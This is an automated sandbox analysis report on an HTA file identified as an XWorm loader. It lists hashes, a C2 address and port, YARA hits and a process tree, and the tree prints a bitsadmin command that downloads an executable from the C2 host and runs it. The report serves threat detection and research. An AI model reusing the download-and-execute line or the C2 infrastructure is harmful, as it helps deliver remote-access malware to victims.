Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
02/04/2024, 18:09
Static task
static1
Behavioral task
behavioral1
Sample
e81963d4c5a431f529c7669d3595a943.hta
Resource
win7-20240319-en
9 signatures
150 seconds
General
-
Target
e81963d4c5a431f529c7669d3595a943.hta
-
Size
834B
-
MD5
e81963d4c5a431f529c7669d3595a943
-
SHA1
82ac49f24caad73263ae461a2c1c7546b1ba9ded
-
SHA256
cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b
-
SHA512
2ba83def4a81ede89bd54a5c0d4b4592985c13a10507b9a2dfb45c46e6e234d54dc14f98562eb2d3d3766e28290e83175c098a6203dd52effacc0176da7bb209
Malware Config
Extracted
Family
xworm
C2
210.246.215.82:7000
Attributes
-
Install_directory
%ProgramData%
-
install_file
WindowsNT.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/2828-0-0x0000000001140000-0x000000000119A000-memory.dmp family_xworm behavioral1/memory/2828-2-0x000000001B430000-0x000000001B4B0000-memory.dmp family_xworm -
Downloads MZ/PE file
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1164 bitsadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2828 s.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2000 wrote to memory of 1164 2000 mshta.exe 28 PID 2000 wrote to memory of 1164 2000 mshta.exe 28 PID 2000 wrote to memory of 1164 2000 mshta.exe 28 PID 2000 wrote to memory of 1164 2000 mshta.exe 28 PID 2000 wrote to memory of 2828 2000 mshta.exe 30 PID 2000 wrote to memory of 2828 2000 mshta.exe 30 PID 2000 wrote to memory of 2828 2000 mshta.exe 30 PID 2000 wrote to memory of 2828 2000 mshta.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe2⤵
- Download via BitsAdmin
PID:1164
-
-
C:\ProgramData\s.exe"C:\ProgramData\s.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828
-